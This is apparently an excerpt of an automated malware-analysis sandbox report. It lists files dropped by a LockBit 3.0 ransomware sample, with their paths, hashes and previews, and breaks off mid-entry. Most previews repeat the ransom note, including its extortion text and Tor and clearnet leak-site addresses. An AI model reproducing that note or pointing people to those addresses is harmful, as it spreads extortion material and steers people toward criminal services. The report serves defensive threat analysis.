                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.981307077496934
                Encrypted:false
                SSDEEP:192:/rt1OLhfWarN6PYv4s/yrbWQZtd9cLja+mphMlHVL2+fWDZkgo:R1IWQN6Pa4G6bWQZj91HhMlG8
                MD5:E2A2692A7596FED7EF4EFB9880179BAC
                SHA1:9DDDC097070E1A83FF2F76913048AB23CE99FD6F
                SHA-256:187F9A9398E51093F640E160BFD5EECF48E9C0BC36ED5FF5AA6C8AC3012058AC
                SHA-512:72C0F4FA1DC2084D0DF12D00F0C32D3A2B5AAE89E8345C0579CC4894223EF5B60EB9C48B807C7CE8732B43AB31FE1F2E2EA64C261FDE21BDE546B6783DC0D40B
                Malicious:false
                Preview:.F$.s.o....Q%".7O..z_..A.....K..P..R1/......$...P,.:.....,.y..).../,....AJ.r.{...-FP.+.x.VE...ay..k..qz&2...,'...LV.]s?...9....p.0`(#O..kz....lb....2....z....x.i.(`..Q..fa..I..kW.u.Z.4....9....Z...&.r...>. .>........L.&..D..-..s.'m..6u.)K.V.l.+.+.l...@D....d3N.l!...W.g[....aV..30..i...'.q.......&D...7^0$W6.>.s..eQ..9...y..\..,6...0...8.6,.@...Cw.8 ....#.@Hmi..C..&...c<F..Z.a|......_.\.].m..}2.3..6.2.X.s.d.9...P..).@sj....m9..fsp2.k.....`..t....7....'.8r./..&.M....'.%ghj.S(...W.......;.....".A....@Y.u.<..ItCPsa\gHG.%.g...I.n'ke....%..G.X......d.,.N%|.j.?..s``{}...kV...P.......s..pA...Hc9.o...U...%.Z...V..jnW.D~z.!h.!..|...$z.T.6h....f...G..@Te..Ta......|...c...{T....xX.`..e.E..OND...r,...._.L....!..Y.,.e~.r.0..I..K.8.?........K.3a...t.......T....Z........;..'.@L......Z....pF.<.m....4}.....L.......Uv.d.P.$...............C...ueo.G.V.}..!FQ.c..<F}........&r}NR..v.!.X...8..b.F...m#..2b...9.v...:...M.F....<.w.#Nb2.k..$}7.E.V

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor 